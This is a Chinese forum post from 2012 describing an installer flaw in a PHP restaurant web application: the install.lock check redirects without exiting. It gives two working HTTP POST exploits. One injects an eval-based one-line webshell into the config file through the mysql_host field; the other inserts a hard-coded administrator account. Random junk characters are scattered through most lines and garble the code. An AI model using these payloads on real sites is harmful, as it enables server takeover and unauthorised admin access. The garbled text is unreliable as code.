问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。
- [, w; t8 F6 m) m( e9 L! G9 ^4 R: R3 w0 U. [
<?php* j* N% W* g+ z9 M
if(file_exists("../install.lock"))
, D2 C( u; j* T) c) }3 L% W5 m{. h* [0 c3 p/ E" O# \
header("Location: ../");//没有退出' ?) @0 Z; h6 m5 L6 V; ^( V t
}
% Z/ w) q4 g8 N& ^8 g" d
% D4 R" Y8 f7 R+ O//echo 'tst';exit;8 a, Z8 Y6 L; R/ E& C% y+ Y
require_once("init.php");
$ C% d' j1 f$ F8 J3 nif(empty($_REQUEST['step']) || $_REQUEST['step']==1)4 ]1 t, W2 z& Q5 _' d$ D: g0 y, O
{1 y( s( L L2 T D! q
可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
$ I5 M( \5 g8 z( R$ U
# w7 b' v& E3 }8 o1、getshell(很危险)
3 Z7 ]6 i/ c- p# u3 G- t3 A7 G- [if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
% {% f" E5 R; f5 _{
) i8 b( T1 t% m% b$smarty->assign("step",1);) \7 Q! C# w' }, ?6 G. a% a/ [
$smarty->display("index.html");7 k4 d2 ?! r" K4 W! D' T5 I8 v
}elseif($_REQUEST['step']==2)
& K" t9 Z n0 j( _& Q+ T{6 Q( b2 b/ ^* i& X
$mysql_host=trim($_POST['mysql_host']);
. G& }5 D' e5 I0 }1 K0 x $mysql_user=trim($_POST['mysql_user']);
+ \% T7 M, E m8 [ $mysql_pwd=trim($_POST['mysql_pwd']);* G- i, `9 U5 L, ? w& c, \/ D2 i
$mysql_db=trim($_POST['mysql_db']);
) d& X* H/ I5 E$ x+ y+ M $tblpre=trim($_POST['tblpre']);
/ N% D- a Q$ b& ? O8 B $domain==trim($_POST['domain']);
% L% B9 R1 D: e/ T* @4 U $str="<?php \r\n";
! V$ e- [. V8 _7 k $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
! f% l- y9 a3 b: M; V7 u7 V- { $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";/ z1 U. v2 L1 h& B7 s
$str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";" f$ j# \: @8 \, |3 I3 i
$str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";! g% s0 R, _0 m/ o: P* @! V
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";
% ]! a0 r5 d, v3 z# [ $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";$ r' Q n2 a. r6 X, y% q2 f6 @
$str.='define("DOMAIN","'.$domain.'");'."\r\n";' _$ r0 S' `0 c# r' |
$str.='define("SKINS","default");'."\r\n";
5 y8 p( t/ \" h' R( C$ A, E! N/ M9 d $str.='?>';
: E+ L; _$ l p( D5 M. y1 V, E file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
+ x1 i/ K$ F/ O; }上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马2 Z" G, B5 t! }4 M: X4 w$ G) `$ s
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
1 P( Y9 J6 b- s4 g% CHost: 192.168.80.129
! a( w3 d% N! \User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
3 _# \ E8 Y1 X% a& P& DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
( Q4 s5 q: S$ N7 h6 ~/ \2 mAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
* f- @9 {, U' F+ q8 VAccept-Encoding: gzip, deflate
3 W3 Y/ j# |6 |/ f- tReferer: http://192.168.80.129/canting/install/index.php?step=1
( q0 Z6 j% k8 K* k t6 WCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
5 s! O- \, Z. BContent-Type: application/x-www-form-urlencoded5 P# W/ z7 R# P; e8 g
Content-Length: 1267 t5 d) e! ^, J0 @- m7 }! D2 `
) W4 a/ I7 j" T5 s
mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD( j6 I* X& ?# U3 G
但是这个方法很危险,将导致网站无法运行。# A& q2 _1 J, I* T B0 _* l, V
- q U2 Z' W, A9 D' c3 l
2、直接添加管理员
" I3 J7 u5 e1 [
( S& ^5 A3 ?; K2 Z r1 F0 @! T' P$ melseif($_REQUEST['step']==5)- }& r6 Q6 M' N9 Z$ U0 Y. l- N
{+ i% G, Y4 o! H" B1 g
if($_POST)% Z) G" x( F, ^0 c1 Z0 I
{ require_once("../config/config.inc.php");
/ E& T7 j; X4 i; d+ @# X( j $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
: L9 _" N F1 ^, L* ?+ X& d mysql_select_db(MYSQL_DB,$link);
9 x7 R; s" u4 y7 ~* u7 A, V; s5 C% d& x. Z mysql_query("SET NAMES ".MYSQL_CHARSET );3 i$ r* [' i4 X# v
mysql_query("SET sql_mode=''");
4 c% @; P6 d2 z6 L' f3 W a9 ?. y6 w0 V
$adminname=trim($_POST['adminname']);. |9 n5 l E3 z
$pwd1=trim($_POST['pwd1']);
2 X5 M& B. o' X5 v ?# ?3 { $pwd2=trim($_POST['pwd2']);
% M% h U1 V* Z' O1 H5 w! q7 v2 X if(empty($adminname))
/ D8 l. e, y3 `* E$ I" f {
/ R& ~2 z5 h- }9 X' O" X' C2 }
& @2 H# B' p7 m7 @# J5 B echo "<script>alert('管理员不能为空');history.go(-1);</script>";4 G7 z1 n; [" s( G' n
exit();
k+ B! V) B# B3 j8 p: q% X }+ Z- e; o: J4 G$ S
if(($pwd1!=$pwd2) or empty($pwd1))
2 z- M4 [& U1 Q [% Q {! F& z9 O, T- r' j! P/ y
echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出* ~, T9 c/ ]5 M0 `
}9 I; P% v9 P+ X( c$ X5 j
mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员, T O& w1 {% B( g
}
; d. t9 j4 R8 R" @( M这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:; y" i0 I: z- e4 ?5 r
POST /canting/install/index.php?m=index&step=5 HTTP/1.1
' w5 @& ?5 Q. QHost: 192.168.80.129
( E7 z. e" T F% o! GUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0$ v. R1 \- x# E1 ^: B; K5 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
" S+ y% i7 R0 l+ A, PAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
1 m; E9 g+ d. E5 f0 Z3 H* l0 ?Accept-Encoding: gzip, deflate
' C& d8 E% s1 l4 Y7 J5 xReferer: http://www.2cto.com /canting/install/index.php?step=1( T# P& n, x. n
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc424 C* M: n2 F+ }* f
Content-Type: application/x-www-form-urlencoded( J& f% d9 Z1 L* B& c; ]
Content-Length: 468 n+ E4 m3 }9 i3 N0 V6 v# D
m) y2 ~- q2 k2 V# q' Uadminname=qingshen&pwd1=qingshen&pwd2=qingshen: Y$ W) ~# I1 G$ R3 W
|
发表于 2012-12-4 11:13:44
收藏
支持
反对